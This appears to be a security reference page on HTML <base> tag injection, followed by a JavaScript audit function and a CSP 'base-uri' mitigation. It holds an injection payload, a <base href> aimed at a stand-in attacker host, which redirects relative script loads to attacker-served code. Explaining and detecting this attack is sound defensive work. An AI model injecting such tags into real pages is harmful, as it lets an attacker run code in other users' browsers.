base

The HTML <base> element specifies the base URL to use for all relative URLs in a document.

Note: If multiple <base> elements are used, only the first href and first target are obeyed — all others are ignored.

Relative URL redirection

<base> tag injection allows you to redirect relative URLs to an attacker-controlled host. For example, suppose the vulnerable site includes a script by relative URL:

<script src="/assets/some-script.js"></script>

If you then inject the following before that relative script reference:

<base href="https://attacker-website.com">

the browser will request https://attacker-website.com/assets/some-script.js.
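
To check a page for this condition, the following added example (not part of the original page) resolves each script src the way the browser does and reports the ones an injected <base> moves to another origin. The names auditBase, attr, SAMPLE and PAGE_URL and the host vulnerable.example are assumptions made for illustration, and the sample HTML is constructed.

```javascript
// Added example: audit HTML for a <base href> that re-points relative script URLs.
// Regex tag scanning is a simplification; a production audit should use an HTML parser.

// Constructed sample input (not from a real site).
const PAGE_URL = "https://vulnerable.example/page";
const SAMPLE = `
<script src="/assets/early.js"></script>
<base href="https://attacker-website.com">
<base href="https://vulnerable.example/">
<script src="/assets/some-script.js"></script>
<script src="https://cdn.example/lib.js"></script>`;

// Return an attribute value from a tag's source text, or null if absent.
function attr(tag, name) {
  const re = new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function auditBase(html, pageUrl) {
  const page = new URL(pageUrl);
  // Browsers obey only the first <base> that carries an href.
  let base = null;
  for (const m of html.matchAll(/<base\b[^>]*>/gi)) {
    const href = attr(m[0], "href");
    if (href !== null) { base = { href, index: m.index }; break; }
  }
  // The base href is itself resolved against the document URL.
  const baseUrl = base ? new URL(base.href, page) : page;
  const findings = [];
  for (const m of html.matchAll(/<script\b[^>]*>/gi)) {
    const src = attr(m[0], "src");
    if (src === null) continue;
    // Only scripts parsed after the <base> element are resolved against it.
    const effective = base && m.index > base.index ? baseUrl : page;
    const intended = new URL(src, page).href;
    const actual = new URL(src, effective).href;
    if (new URL(actual).origin !== new URL(intended).origin) {
      findings.push({ src, intended, actual });
    }
  }
  return { baseHref: base ? base.href : null, findings };
}

console.log(JSON.stringify(auditBase(SAMPLE, PAGE_URL), null, 2));
```

A Content-Security-Policy header containing base-uri 'self' (or base-uri 'none') makes the browser ignore an injected <base href> that points at another origin.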
